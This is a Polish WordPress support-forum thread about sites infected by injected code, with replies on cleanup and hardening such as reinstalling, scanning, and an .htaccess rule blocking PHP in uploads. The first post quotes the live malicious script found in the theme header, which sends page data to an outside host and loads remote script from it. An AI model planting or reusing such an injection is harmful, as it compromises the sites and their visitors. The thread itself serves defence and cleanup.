• Witam, kilka z moich WordPress na serwerze zostało zainfekowanych wirusem. Strony działają, ale nie można dostać się do panelu admina, jest pusta, biała strona i nic się nie wyświetla. W header templatek jest taki kod, ale jest pewnie też w plikach js czy innych, wiecie może jak to świństwo usunąć najszybciej albo chociaż żeby można było się dostać do panelu? Ze znalezieniem tego kodu akurat problemu nie mam we wszystkich plikach tylko co jeszcze mogło zostać dopisane-.- a… i po usunięciu tego kodu na drugi dzień wraca, wiec na pewno coś jest jeszcze. Dzięki za pomoc.

    <script>var a=''; setTimeout(10); var default_keyword = encodeURIComponent(document.title); var se_referrer = encodeURIComponent(document.referrer); var host = encodeURIComponent(window.location.host); var base = "http://americanlyceum.com/js/jquery.min.php"; var n_url = base + "?default_keyword=" + default_keyword + "&se_referrer=" + se_referrer + "&source=" + host; var f_url = base + "?c_utt=snt2014&c_utm=" + encodeURIComponent(n_url); if (default_keyword !== null && default_keyword !== '' && se_referrer !== null && se_referrer !== ''){document.write('<script type="text/javascript" src="' + f_url + '">' + '<' + '/script>');}</script>
Viewing 4 replies - 1 through 4 (of 4 total)
  • Tego typu wirusy to dość częsty i uciążliwy problem.

    Zainstaluj Wszystkie WordPressy na nowo, wszystkie wtyczki i motywy – zostaw tylko pliki wp-content/uploads resztę musisz ręcznie wgrać na nowo.

    Jeżeli na serwerze są też inne skrypty musisz zrobić z nimi to samo, zlecić skan firmie hostingowej i przejrzeć serwer w poszukiwaniu podejrzanych plików (skany nie wykryją wszystkiego).

    Jeżeli nie chcesz się z tym męczyć samemu napisz znajdziemy wspólnie jakieś korzystne rozwiązanie.

    mateusz[@]jaworowi.cz
    Opinie: http://jaworowi.cz/opinie

    Większych bzdur w życiu nie czytałem, po 1 trzeba zastosować kwarantanne i wyłączyć strony aby nie infekowały innych użytkowników po 2 przeskanować wszystkie strony na tym ftp po 3 uzunąć zagrożenie zaktualizować skrypty i kompletną bzdurą jest, że można zostawić katalog uploads bez opieki, ponieważ w nim również mogą znajdować się zainfekowane pliki.. Kolejna rzecz to nie trzeba wcale instalować wszystkiego na nowo, chyba że istnieje kopia zapasowa..

    Mówiąc „zostaw uploads” miałem na myśli, aby go nie usuwać 🙂
    Dalej pisałem o skanie i poszukiwaniu podejrzanych plików.

    Dodam, że wykonywanie plików w /wp-content/uploads można łatwo rozwiązać wklejając w htaccess poniższą regułę:

    <IfModule mod_rewrite.c>
    		RewriteEngine On
    		# Wylaczenie uruchamiania plikow php w UPLOADS
    		RewriteRule ^wp\-content/uploads/.*\.(?:php[1-6]?|pht|phtml?)$ - [NC,F]
    	</IfModule>

    Stronę należy kompleksowo sprawdzić i odświeżyć. Jeżeli zostanie jakiś plik zawirusowany to spowrotem może się strona zainfekować. Samemu tak miałem i później musiałem skorzystać z profesjonalnej pomocy osób – http://netkeeper.pl/usuwanie-wirusow/.

Viewing 4 replies - 1 through 4 (of 4 total)
  • Temat ‘Wirus na WordPress’ jest zamknięty na nowe odpowiedzi.